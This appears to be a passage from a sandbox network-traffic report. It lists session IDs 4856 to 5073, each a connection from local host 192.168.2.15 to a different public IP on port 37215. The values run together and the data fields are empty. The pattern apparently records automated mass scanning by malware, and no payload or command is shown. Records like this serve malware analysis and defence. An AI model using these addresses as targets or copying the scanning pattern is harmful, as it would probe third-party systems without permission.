                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4856192.168.2.1538316121.168.2.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4857192.168.2.1540280181.130.132.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4858192.168.2.154317041.184.179.8637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4859192.168.2.154447231.82.186.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4860192.168.2.1560946102.70.101.13937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4861192.168.2.1557416222.154.208.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4862192.168.2.1542346157.224.254.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4863192.168.2.1539540197.139.125.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4864192.168.2.1540252186.19.220.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4865192.168.2.15530929.48.250.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4866192.168.2.156020445.167.224.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4867192.168.2.1532962156.4.217.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4868192.168.2.1556136121.96.88.3037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4869192.168.2.154159241.164.242.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4870192.168.2.1544260121.219.162.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4871192.168.2.1537090197.213.203.13637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4872192.168.2.1537574102.135.152.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4873192.168.2.1543280181.203.165.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4874192.168.2.153986041.228.101.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4875192.168.2.1544926181.171.34.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4876192.168.2.1535472222.163.247.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4877192.168.2.1544066190.144.205.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4878192.168.2.153608237.157.201.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4879192.168.2.1544758157.118.36.7737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4880192.168.2.153611894.105.177.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4881192.168.2.1537148121.254.82.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4882192.168.2.1544536102.42.125.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4883192.168.2.1560460190.156.91.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4884192.168.2.1555516121.242.156.19237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4885192.168.2.1546594186.252.126.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4886192.168.2.154045494.116.91.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4887192.168.2.155958441.184.116.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4888192.168.2.1558652181.143.136.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4889192.168.2.1542644222.151.174.14237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4890192.168.2.154186045.46.161.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4891192.168.2.1553426185.118.5.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4892192.168.2.1533594157.107.103.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4893192.168.2.1553174122.26.243.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4894192.168.2.154830231.59.102.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4895192.168.2.154346031.96.178.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4896192.168.2.1554488181.45.102.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4897192.168.2.1547212128.200.0.12437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4898192.168.2.155945494.202.184.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4899192.168.2.156005294.58.201.12837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4900192.168.2.1544990186.90.84.14437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4901192.168.2.1559624181.235.188.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4902192.168.2.1538930102.149.178.4537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4903192.168.2.1555666122.137.135.15637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4904192.168.2.155203431.117.175.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4905192.168.2.1536148156.135.111.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4906192.168.2.1553580157.28.85.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4907192.168.2.1556932190.152.129.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4908192.168.2.154713894.33.213.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4909192.168.2.1545480122.9.154.25537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4910192.168.2.1559164186.229.164.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4911192.168.2.1558126190.19.211.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4912192.168.2.1543606156.44.82.9937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4913192.168.2.1541060186.208.184.17237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4914192.168.2.1536900181.188.252.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4915192.168.2.1560694190.15.82.24837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4916192.168.2.1549460197.43.36.12637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4917192.168.2.1553526206.245.253.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4918192.168.2.1548108222.72.68.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4919192.168.2.153767831.218.203.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4920192.168.2.1546120190.175.55.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4921192.168.2.1535278157.250.88.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4922192.168.2.1553638122.152.99.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4923192.168.2.1547014138.69.196.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4924192.168.2.1559344186.64.103.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4925192.168.2.154932045.175.143.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4926192.168.2.154773441.21.249.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4927192.168.2.153620441.92.20.5037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4928192.168.2.1549468157.163.78.037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4929192.168.2.153911637.95.170.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4930192.168.2.154023637.220.192.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4931192.168.2.155144441.83.53.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4932192.168.2.1541348121.40.191.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4933192.168.2.1547656105.237.201.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4934192.168.2.1555290190.93.202.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4935192.168.2.154067237.101.65.24537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4936192.168.2.1537682222.74.128.12137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4937192.168.2.1533990102.52.171.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4938192.168.2.1535798190.36.99.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4939192.168.2.1555992102.203.221.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4940192.168.2.1552620156.113.190.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4941192.168.2.1543996122.17.90.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4942192.168.2.1545172186.187.112.6037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4943192.168.2.153419294.58.132.20837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4944192.168.2.1553244222.178.36.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4945192.168.2.1547436197.169.55.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4946192.168.2.1546976186.240.226.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4947192.168.2.1536110222.74.173.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4948192.168.2.1548778222.99.32.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4949192.168.2.1556458186.184.215.18737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4950192.168.2.1558122211.134.169.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4951192.168.2.153896441.228.200.13237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4952192.168.2.155165841.158.187.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4953192.168.2.1537018190.40.81.2837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4954192.168.2.153470623.129.184.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4955192.168.2.154183631.42.79.137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4956192.168.2.1556380186.45.248.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4957192.168.2.154014441.47.168.10437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4958192.168.2.1541268122.221.150.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4959192.168.2.1533134222.144.15.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4960192.168.2.1536188190.53.56.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4961192.168.2.1541916190.52.251.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4962192.168.2.1543524197.36.72.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4963192.168.2.1546738197.232.147.6737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4964192.168.2.1558304156.243.178.6637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4965192.168.2.1540018121.232.124.22937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4966192.168.2.1557840186.153.80.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4967192.168.2.1541394181.30.152.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4968192.168.2.1541152197.195.188.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4969192.168.2.154877045.167.20.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4970192.168.2.154590845.59.221.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4971192.168.2.1551134102.123.154.17937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4972192.168.2.1549570122.219.186.7137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4973192.168.2.1557572156.220.120.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4974192.168.2.1534830102.110.82.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4975192.168.2.155621241.51.144.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4976192.168.2.1554406186.166.19.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4977192.168.2.1533914157.73.29.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4978192.168.2.1538724156.238.86.18637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4979192.168.2.1546916190.0.173.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4980192.168.2.1555884197.171.243.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4981192.168.2.1537276197.242.199.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4982192.168.2.154572037.134.68.16437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4983192.168.2.153879037.122.135.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4984192.168.2.154923694.113.168.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4985192.168.2.1541788121.56.231.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4986192.168.2.1553124138.139.12.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4987192.168.2.153590694.254.9.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4988192.168.2.155196441.100.215.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4989192.168.2.155506041.169.181.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4990192.168.2.155478237.126.192.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4991192.168.2.1558796197.241.173.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4992192.168.2.1545210186.212.165.22637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4993192.168.2.1542236190.164.95.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4994192.168.2.1540672190.173.117.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4995192.168.2.1547398138.245.191.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4996192.168.2.1559198122.73.130.4037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4997192.168.2.1560136122.193.26.6237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4998192.168.2.1533764190.133.52.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              4999192.168.2.1535958121.129.247.24337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5000192.168.2.1558602197.11.3.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5001192.168.2.1545722121.143.46.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5002192.168.2.1557316138.95.153.15137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5003192.168.2.1546714157.221.54.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5004192.168.2.153310441.54.202.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5005192.168.2.1539020121.191.205.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5006192.168.2.1556122222.187.8.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5007192.168.2.1550698186.224.164.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5008192.168.2.153502491.149.7.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5009192.168.2.1543788181.240.214.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5010192.168.2.154215073.77.82.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5011192.168.2.1538166122.185.213.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5012192.168.2.1536518197.224.152.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5013192.168.2.153721641.248.121.18437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5014192.168.2.1536782186.168.210.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5015192.168.2.156023241.13.156.4337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5016192.168.2.1550492121.58.3.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5017192.168.2.1548556186.146.62.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5018192.168.2.1545570181.242.180.4137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5019192.168.2.1551610197.133.173.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5020192.168.2.155712294.115.183.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5021192.168.2.154902431.176.231.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5022192.168.2.154355837.22.133.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5023192.168.2.1549520156.180.195.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5024192.168.2.1546536121.13.133.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5025192.168.2.1540568156.196.180.7337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5026192.168.2.155616037.115.120.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5027192.168.2.1548684138.179.152.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5028192.168.2.154067645.9.219.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5029192.168.2.15335865.97.227.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5030192.168.2.156007894.160.104.10737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5031192.168.2.1537442190.195.72.6437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5032192.168.2.1557148162.183.96.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5033192.168.2.1547806138.198.71.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5034192.168.2.1534220197.102.84.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5035192.168.2.1550396222.150.53.22037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5036192.168.2.153619645.252.10.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5037192.168.2.1554966102.166.190.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5038192.168.2.1553336102.128.141.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5039192.168.2.155134431.167.100.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5040192.168.2.1541386190.42.96.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5041192.168.2.154729645.90.248.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5042192.168.2.153957694.116.250.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5043192.168.2.1538392138.122.93.11637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5044192.168.2.153328445.40.160.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5045192.168.2.1532964181.179.48.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5046192.168.2.1555886181.248.241.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5047192.168.2.1540968157.85.248.3937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5048192.168.2.1545506156.170.55.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5049192.168.2.1547754102.170.142.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5050192.168.2.155954631.177.237.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5051192.168.2.1545608222.195.194.23737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5052192.168.2.1537968190.9.109.24637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5053192.168.2.155638445.228.194.22737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5054192.168.2.154097445.203.74.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5055192.168.2.1557834186.70.254.6337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5056192.168.2.154648241.154.16.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5057192.168.2.153782631.184.37.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5058192.168.2.155993241.48.181.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5059192.168.2.155825241.175.85.24037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5060192.168.2.1538324138.201.204.15837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5061192.168.2.1538672121.67.242.8437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5062192.168.2.1534638122.2.39.3237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5063192.168.2.154899094.120.236.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5064192.168.2.1539220186.20.96.16737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5065192.168.2.1545640138.70.180.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5066192.168.2.1557774121.249.176.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5067192.168.2.155209231.230.228.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5068192.168.2.1559704156.150.61.10137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5069192.168.2.156053841.113.181.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5070192.168.2.1537266186.255.58.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5071192.168.2.1546914157.169.125.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5072192.168.2.1537246222.121.190.1637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              5073192.168.2.1535708190.130.146.037215
                                              TimestampBytes transferredDirectionData


